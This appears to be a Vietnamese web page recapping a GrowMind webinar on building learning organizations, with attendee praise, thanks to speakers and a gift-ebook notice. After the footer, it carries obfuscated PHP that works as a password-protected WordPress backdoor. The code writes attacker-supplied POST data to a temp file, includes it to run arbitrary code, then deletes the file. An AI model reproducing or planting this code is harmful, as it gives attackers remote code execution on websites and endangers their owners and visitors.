[WEBINAR] XÂY DỰNG TỔ CHỨC HỌC TẬP – TỪ TẦM NHÌN ĐẾN THỰC TẾ

“Các Speaker phát biểu đều rất hay, rất thực tế. Câu chuyện của Relipa rất chân thực, được tiếp thêm doping để đề xuất Sếp mạnh mẽ đầu tư hơn cho hoạt động học tập”.

Đó là một trong những chia sẻ của người tham gia vào cuối chương trình, diễn ra vào tối ngày hôm qua 28/12/2021.

Với kinh nghiệm Tư vấn và Xây dựng tổ chức học tập tại các doanh nghiệp, GrowMind đã chia sẻ các câu chuyện và bài học thực tế về Chiến lược phát triển nguồn lực thông qua hoạt động xây dựng Tổ chức Học tập cho các doanh nghiệp với mong muốn “Đồng kiến tạo” các doanh nghiệp tiến bộ và hạnh phúc.

GrowMind trân trọng cảm ơn các Diễn giả và Khách mời đã dành thời gian nghỉ ngơi của mình vào buổi tối để đồng hành & kết nối với chương trình.

Quà tặng của chương trình, bao gồm Ebook Báo cáo xu hướng học tập trong doanh nghiệp 2022 của Udemy (do GrowMind dịch và biên tập) + Tài liệu thuyết trình trong chương trình đã được gửi qua email đăng ký của người tham gia. Mời các anh/chị kiểm tra email.

Hãy theo dõi fanpage để cập nhật những kiến thức bổ ích và cập nhật những hoạt động mới sắp tới của GrowMind!

Cùng nhìn lại một số hình ảnh trong chương trình tối qua nhé!

Các diễn giả, khách mời nhiệt tình và chân thành chia sẻ trong suốt chương trình.

Gần 100 anh chị em từ các công ty ITO có nhu cầu xây dựng tổ chức học tập ở doanh nghiệp mình đã tham dự vào chương trình của GrowMind.

Các nội dung chia sẻ thực tế và cô đọng, hữu ích với người tham gia.

Dù là lần đầu tổ chức nhưng webinar đã nhận được sự ủng hộ và phản hồi tích cực từ người tham gia.

Các Webinar khác được tổ chức từ GrowMind


GrowMind – Đồng kiến tạo các công ty tiến bộ và hạnh phúc!

Theo dõi thêm các hoạt động từ GrowMind tại đây!

1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}